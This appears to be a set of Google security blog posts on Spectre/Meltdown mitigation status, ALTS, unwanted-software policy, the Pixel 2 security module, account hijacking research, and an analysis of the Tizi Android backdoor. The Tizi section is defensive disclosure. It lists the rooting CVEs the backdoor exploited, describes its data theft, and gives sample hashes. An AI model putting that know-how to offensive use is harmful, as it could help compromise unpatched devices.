A list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.

  • All Google products not explicitly listed below require no user or customer action.
  • Android
    • Devices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.
    • Supported Nexus and Pixel devices with the latest security update are protected.
    • Further information is available here.
  • Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):
    • No additional user or customer action needed.
  • Google Chrome
    • Some user or customer action needed. More information here.
  • Google Chrome OS (e.g., Chromebooks):
    • Some additional user or customer action needed. More information here.
  • Google Cloud Platform
    • Google App Engine: No additional customer action needed.
    • Google Compute Engine: Some additional customer action needed. More information here.
    • Google Kubernetes Engine: Some additional customer action needed. More information here.
    • Google Cloud Dataflow: Some additional customer action needed. More information here.
    • Google Cloud Dataproc: Some additional customer action needed. More information here.
    • All other Google Cloud products and services: No additional action needed.
  • Google Home / Chromecast:
    • No additional user action needed.
  • Google Wifi/OnHub:
    • No additional user action needed.
Multiple methods of attack

To take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.

The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive information such as passwords, cryptographic key material, etc.

In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.

There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.

We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.

Blog post update log

  • Added link to Project Zero blog
  • Added link to Google Cloud blog


At Google, protection of customer data is a top priority. One way we do this is by protecting data in transit by default. We protect data when it is sent to Google using secure communication protocols such as TLS (Transport Layer Security). Within our infrastructure, we protect service-to-service communications at the application layer using a system called Application Layer Transport Security (ALTS). ALTS authenticates the communication between Google services and helps protect data in transit. Today, we’re releasing a whitepaper, “Application Layer Transport Security,” that goes into detail about what ALTS is, how it protects data, and how it’s implemented at Google.

ALTS is a highly reliable, trusted system that provides authentication and security for our internal Remote Procedure Call (RPC) communications. ALTS requires minimal involvement from the services themselves. When services communicate with each other at Google, such as the Gmail frontend communicating with a storage backend system, they do not need to explicitly configure anything to ensure data transmission is protected; it is protected by default. All RPCs issued or received by a production workload that stay within a physical boundary controlled by or on behalf of Google are protected with ALTS by default. This delivers numerous benefits while allowing the system to work at scale:

  1. More precise security: Each workload has its own identity. This allows workloads running on the same machine to authenticate using their own identity as opposed to the machine’s identity.
  2. Improved scalability: ALTS accommodates Google’s massive scale by using an efficient resumption mechanism embedded in the ALTS handshake protocol, allowing services that were already communicating to easily resume communications. ALTS can also accommodate the authentication and encryption needs of a large number of RPCs; for example, services running on Google production systems collectively issue on the order of O(10^10) RPCs per second.
  3. Reduced overhead: The overhead of potentially expensive cryptographic operations can be reduced by supporting long-lived RPC channels.

Multiple features that ensure security and scalability

Inside physical boundaries controlled by or on behalf of Google, all scheduled production workloads are initialized with a certificate that asserts their identity. These credentials are securely delivered to the workloads. When a workload is involved in an ALTS handshake, it verifies the remote peer identity and certificate. To further increase security, all Google certificates have a relatively short lifespan.

ALTS has a flexible trust model that works for different types of entities on the network. Entities can be physical machines, containerized workloads, and even human users to whom certificates can be provisioned.

ALTS provides a handshake protocol, which is a Diffie-Hellman (DH) based authenticated key exchange protocol that Google developed and implemented. At the end of a handshake, ALTS provides applications with an authenticated remote peer identity, which can be used to enforce fine-grained authorization policies at the application layer.



ALTS ensures that the integrity of Google traffic is protected, and that it is encrypted as needed.

After a handshake is complete and the client and server have negotiated the necessary shared secrets, ALTS secures RPC traffic by enforcing integrity, with optional encryption, using those negotiated shared secrets. We support multiple protocols for integrity guarantees, e.g., AES-GMAC and AES-VMAC with 128-bit keys. Whenever traffic leaves a physical boundary controlled by or on behalf of Google, e.g., in transit over the WAN between datacenters, all protocols are upgraded automatically to provide encryption as well as integrity guarantees. In this case, we use the AES-GCM and AES-VCM protocols with 128-bit keys.

More details on how Google data encryption is performed are available in another whitepaper we are releasing today, “Encryption in Transit in Google Cloud.”

In summary, ALTS is widely used in Google’s infrastructure to provide service-to-service authentication and integrity, with optional encryption for all Google RPC traffic. For more information about ALTS, please read our whitepaper, “Application Layer Transport Security.”




Updated on 12/14/17 to further distinguish between Unwanted Software Policy and Google Play Developer Program Policy
In our efforts to protect users and serve developers, the Google Safe Browsing team has expanded enforcement of Google's Unwanted Software Policy to further tamp down on unwanted and harmful mobile behaviors on Android. As part of this expanded enforcement, Google Safe Browsing will show warnings on apps and on websites leading to apps that collect a user’s personal data without their consent.

Apps handling personal user data (such as a user’s phone number or email) or device data are required to prompt users and to provide their own privacy policy in the app. Additionally, if an app collects and transmits personal data unrelated to the functionality of the app, then prior to collection and transmission the app must prominently highlight how the user data will be used and have the user provide affirmative consent for such use.

These data collection requirements apply to all functions of the app. For example, in analytics and crash reporting, the list of installed packages unrelated to the app may not be transmitted from the device without prominent disclosure and affirmative consent.

These requirements, under the Unwanted Software Policy, apply to apps in Google Play and non-Play app markets. The Google Play team has also published guidelines for how Play apps should handle user data and provide disclosure.

Starting in 60 days, this expanded enforcement of Google’s Unwanted Software Policy may result in warnings shown on user devices via Google Play Protect or on webpages that lead to these apps. Webmasters whose sites show warnings due to distribution of these apps should refer to the Search Console for guidance on remediation and resolution of the warnings. Developers whose apps show warnings should refer to guidance in the Unwanted Software Help Center. Developers can also request an app review using this article on App verification and appeals, which contains guidance applicable to apps in both Google Play and non-Play app stores. Apps published in Google Play have specific criteria to meet under Google Play’s Developer Program Policies; these criteria are outlined in the Play August 2017 announcement.



Google is constantly working to improve our systems that protect users from Potentially Harmful Applications (PHAs). Usually, PHA authors attempt to install their harmful apps on as many devices as possible. However, a few PHA authors spend substantial effort, time, and money to create and install their harmful app on a small number of devices to achieve a certain goal.

This blog post covers Tizi, a backdoor family with some rooting capabilities that was used in a targeted attack against devices in African countries, specifically: Kenya, Nigeria, and Tanzania. We'll talk about how the Google Play Protect and Threat Analysis teams worked together to detect and investigate Tizi-infected apps and remove and block them from Android devices.
What is Tizi?

Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.

Here is an example social media post promoting a Tizi-infected app:

What are we doing?

To protect Android devices and users, we used Google Play Protect to disable Tizi-infected apps on affected devices and have notified users of all known affected devices. The developers' accounts have been suspended from Play.

The Google Play Protect team also used information and signals from the Tizi apps to update Google’s on-device security services and the systems that search for PHAs. These enhancements have been enabled for all users of our security services and increase coverage for Google Play users and the rest of the Android ecosystem.

Additionally, there is more technical information below to help the security industry in our collective work against PHAs.


What do I need to do?

Through our investigation, we identified around 1,300 devices affected by Tizi. To reduce the chance of your device being affected by PHAs and other threats, we recommend these 5 basic steps:
  • Check permissions: Be cautious with apps that request unreasonable permissions. For example, a flashlight app shouldn't need access to send SMS messages.
  • Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.
  • Update your device: Keep your device up-to-date with the latest security patches. Tizi exploited older and publicly known security vulnerabilities, so devices that have up-to-date security patches are less exposed to this kind of attack.
  • Google Play Protect: Ensure Google Play Protect is enabled.
  • Locate your device: Practice finding your device, because you are far more likely to lose your device than install a PHA.

How does Tizi work?

The Google Play Protect team had previously classified some samples as spyware or backdoor PHAs without connecting them as a family. The early Tizi variants didn't have rooting capabilities or obfuscation, but later variants did.

After gaining root, Tizi steals sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. It usually first contacts its command-and-control servers by sending an SMS with the device's GPS coordinates to a specific number. Subsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server. The backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps. Tizi apps can also record ambient audio and take pictures without displaying the image on the device's screen.

Tizi can root the device by exploiting one of the following local vulnerabilities:
  • CVE-2012-4220
  • CVE-2013-2596
  • CVE-2013-2597
  • CVE-2013-2595
  • CVE-2013-2094
  • CVE-2013-6282
  • CVE-2014-3153
  • CVE-2015-3636
  • CVE-2015-1805
Most of these vulnerabilities target older chipsets, devices, and Android versions. All of the listed vulnerabilities are fixed on devices with a security patch level of April 2016 or later, and most of them were patched considerably before that date. Devices with this patch level or later are far less exposed to Tizi's capabilities. If a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls.


Samples uploaded to VirusTotal

To encourage further research in the security community, here are some sample applications embedding Tizi that were already on VirusTotal.

Package name: com.press.nasa.com.tanofresh
SHA256 digest: 4d780a6fc18458311250d4d1edc750468fdb9b3e4c950dce5b35d4567b47d4a7
SHA1 certificate: 816bbee3cab5eed00b8bd16df56032a96e243201

Package name: com.dailyworkout.tizi
SHA256 digest: 7c6af091a7b0f04fb5b212bd3c180ddcc6abf7cd77478fd22595e5b7aa7cfd9f
SHA1 certificate: 404b4d1a7176e219eaa457b0050b4081c22a9a1a

Package name: com.system.update.systemupdate
SHA256 digest: 7a956c754f003a219ea1d2205de3ef5bc354419985a487254b8aeb865442a55e
SHA1 certificate: 4d2962ac1f6551435709a5a874595d855b1fa8ab


Additional digests linked to Tizi

To encourage further research in the security community, here are some sample digests of exploits and utilities that were used or abused by Tizi.

Filename: run_root_shell
SHA256 digest: f2e45ea50fc71b62d9ea59990ced755636286121437ced6237aff90981388f6a

Filename: iovyroot
SHA256 digest: 4d0887f41d0de2f31459c14e3133debcdf758ad8bbe57128d3bec2c907f2acf3

Filename: filesbetyangu.tar
SHA256 digest: 9869871ed246d5670ebca02bb265a584f998f461db0283103ba58d4a650333be


The new Google Pixel 2 ships with a dedicated hardware security module designed to be robust against physical attacks. This hardware module performs lockscreen passcode verification and protects your lock screen better than software alone.

To learn more about the new protections, let’s first review the role of the lock screen. Enabling a lock screen protects your data not just against casual thieves, but also against sophisticated attacks. Many Android devices, including all Pixel phones, use your lock screen passcode to derive the key that is then used to encrypt your data. Until you unlock your phone for the first time after a reboot, an attacker cannot recover the key (and hence your data) without first knowing your passcode. To protect against brute-force passcode guessing, devices running Android 7.0+ verify your attempts in a secure environment that limits how often you can guess. Only when the secure environment has successfully verified your passcode does it reveal a device- and user-specific secret, which is then used to derive the disk encryption key.
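
To make that flow concrete, here is a deliberately simplified Kotlin sketch. It is not Android's actual implementation: PBKDF2 stands in for the real key derivation, and deviceSecret models the value the secure environment reveals only after verifying your passcode:

```kotlin
import javax.crypto.SecretKeyFactory
import javax.crypto.spec.PBEKeySpec

// Illustrative only: the disk encryption key depends on both the user's
// passcode and a device- and user-specific secret, so neither alone is
// enough to decrypt the data.
fun deriveDiskKey(passcode: CharArray, deviceSecret: ByteArray): ByteArray {
    val spec = PBEKeySpec(passcode, /* salt = */ deviceSecret, 10_000, 256)
    val factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
    return factory.generateSecret(spec).encoded
}
```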

Benefits of tamper-resistant hardware

The goal of these protections is to prevent attackers from decrypting your data without knowing your passcode, but the protections are only as strong as the secure environment that verifies the passcode. Performing these types of security-critical operations in tamper-resistant hardware significantly increases the difficulty of attacking it.
Tamper-resistant hardware comes in the form of a discrete chip separate from the System on a Chip (SoC). It includes its own flash, RAM, and other resources inside a single package, so it can fully control its own execution. It can also detect and defend against outside attempts to physically tamper with it.

In particular:
  • Because it has its own dedicated RAM, it’s robust against many side-channel information leakage attacks, such as those described in the TruSpy cache side-channel paper.
  • Because it has its own dedicated flash, it’s harder to interfere with its ability to store state persistently.
  • It loads its operating system and software directly from internal ROM and flash, and it controls all updates to them, so attackers can’t directly tamper with its software to inject malicious code.
  • Tamper-resistant hardware is resilient against many physical fault injection techniques including attempts to run outside normal operating conditions, such as wrong voltage, wrong clock speed, or wrong temperature. This is standardized in specifications such as the SmartCard IC Platform Protection Profile, and tamper-resistant hardware is often certified to these standards.
  • Tamper-resistant hardware is usually housed in a package that is resistant to physical penetration and designed to resist side-channel attacks, including power analysis, timing analysis, and electromagnetic sniffing, such as those described in the SoC it to EM paper.

Security module in Pixel 2

The new Google Pixel 2 ships with a security module built using tamper-resistant hardware that protects your lock screen and your data against many sophisticated hardware attacks.

In addition to all the benefits already mentioned, the security module in Pixel 2 also helps protect you against software-only attacks:
  • Because it performs very few functions, it has a super small attack surface.
  • With passcode verification happening in the security module, even in the event of a full compromise elsewhere, the attacker cannot derive your disk encryption key without compromising the security module first.
  • The security module is designed so that nobody, including Google, can update the passcode verification logic to a weakened version without knowing your passcode first.
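
Put together, the module's job can be modeled as a few guarded operations. The Kotlin sketch below is our conceptual model, not real firmware: a throttled passcode check that releases the key-derivation secret only on success, and an update path that is itself gated on the current passcode:

```kotlin
import java.security.MessageDigest

// Conceptual model of the security module's behavior; real hardware
// enforces this in tamper-resistant silicon, not application code.
class SecurityModuleModel(
    private val passcodeHash: ByteArray, // stored inside the module
    private val deviceSecret: ByteArray  // released only after verification
) {
    private var failedAttempts = 0

    // Each failure increases a mandatory delay, blunting brute-force
    // guessing even for an attacker with physical access.
    fun verify(attempt: ByteArray): ByteArray? {
        Thread.sleep(delayMillis(failedAttempts))
        return if (MessageDigest.isEqual(sha256(attempt), passcodeHash)) {
            failedAttempts = 0
            deviceSecret
        } else {
            failedAttempts++
            null
        }
    }

    // Updating the verification logic requires the current passcode, so a
    // weakened version can't be installed without it. Real hardware would
    // also authenticate the update's signature before flashing it.
    fun applyUpdate(attempt: ByteArray, newLogic: ByteArray): Boolean =
        verify(attempt) != null

    private fun delayMillis(failures: Int): Long =
        if (failures == 0) 0L else (1L shl minOf(failures, 12)) * 100

    private fun sha256(bytes: ByteArray): ByteArray =
        MessageDigest.getInstance("SHA-256").digest(bytes)
}
```
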
Summary

Just like many other Google products, such as Chromebooks and Cloud, Android and Pixel are investing in additional hardware protections to make your device more secure. With the new Google Pixel 2, your data is safer against an entire class of sophisticated hardware attacks.


Account takeover, or ‘hijacking’, is unfortunately a common problem for users across the web. More than 15% of Internet users have reported experiencing the takeover of an email or social networking account. However, despite its familiarity, there is a dearth of research about the root causes of hijacking.

With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data. We’ve highlighted some important findings from our investigation below. We presented our study at the Conference on Computer and Communications Security (CCS) and it’s now available here.

What we learned from the research proved to be immediately useful. We applied its insights to our existing protections and secured 67 million Google accounts before they were abused. We’re sharing this information publicly so that other online services can better secure their users, and can also supplement their authentication systems with more protections beyond just passwords.


How hijackers steal passwords on the black market

Our research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.

While our study focused on Google, these password-stealing tactics pose a risk to all account-based online services. In the case of third-party data breaches, 12% of the exposed records included a Gmail address serving as a username and a password; of those passwords, 7% were valid due to reuse. When it comes to phishing and keyloggers, attackers frequently target Google accounts with varying success: 12-25% of attacks yield a valid password.

However, because a password alone is rarely sufficient for gaining access to a Google account, increasingly sophisticated attackers also try to collect sensitive data that we may request when verifying an account holder’s identity. We found 82% of blackhat phishing tools and 74% of keyloggers attempted to collect a user’s IP address and location, while another 18% of tools collected phone numbers and device make and model.

By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.

Protecting our users from account takeover

Our findings were clear: enterprising hijackers are constantly searching for, and are able to find, billions of different platforms’ usernames and passwords on black markets. While we have already applied these insights to our existing protections, our findings are yet another reminder that we must continuously evolve our defenses in order to stay ahead of these bad actors and keep users safe.

For many years, we’ve applied a ‘defense in depth’ approach to security: a layered series of constantly improving protections that automatically prevent, detect, and mitigate threats to keep your account safe.

Prevention

A wide variety of safeguards help us to prevent attacks before they ever affect our users. For example, Safe Browsing, which now protects more than 3 billion devices, alerts users before they visit a dangerous site or when they click a link to a dangerous site within Gmail. We recently announced the Advanced Protection Program, which provides extra security for users who are at elevated risk of attack.

Detection

We monitor every login attempt to your account for suspicious activity. When there is a sign-in attempt from a device you’ve never used, or a location from which you don’t commonly access your account, we’ll require additional information before granting access to your account. For example, if you sign in from a new laptop and you have a phone associated with your account, you will see a prompt, which we call a dynamic verification challenge.
This challenge provides two-factor authentication on all suspicious logins, while mitigating the risk of account lockout.
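
In simplified form, that decision logic looks something like the Kotlin sketch below; the signals and their handling are invented for illustration and are far coarser than the real system:

```kotlin
// Illustrative risk-based sign-in decision; real systems weigh many more
// signals than these two.
data class SignInAttempt(
    val passwordCorrect: Boolean,
    val knownDevice: Boolean,
    val usualLocation: Boolean
)

sealed class Decision {
    object Allow : Decision()
    object Challenge : Decision() // dynamic verification, e.g. a phone prompt
    object Deny : Decision()
}

fun decide(attempt: SignInAttempt): Decision = when {
    !attempt.passwordCorrect -> Decision.Deny
    attempt.knownDevice && attempt.usualLocation -> Decision.Allow
    // Correct password but unfamiliar device or location: require a second
    // factor rather than locking the user out.
    else -> Decision.Challenge
}
```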

Mitigation

Finally, we regularly scan activity across Google’s suite of products for suspicious actions performed by hijackers. When we find any, we quickly lock down the affected accounts to prevent further damage. We prevent or undo actions we attribute to account takeover, notify the affected user, and help them change their password and re-secure their account.

What you can do

There are some simple steps you can take that make these defenses even stronger. Visit our Security Checkup to make sure you have recovery information associated with your account, like a phone number. Allow Chrome to automatically generate passwords for your accounts and save them via Smart Lock. We’re constantly working to improve these tools, and our automatic protections, to keep your data safe.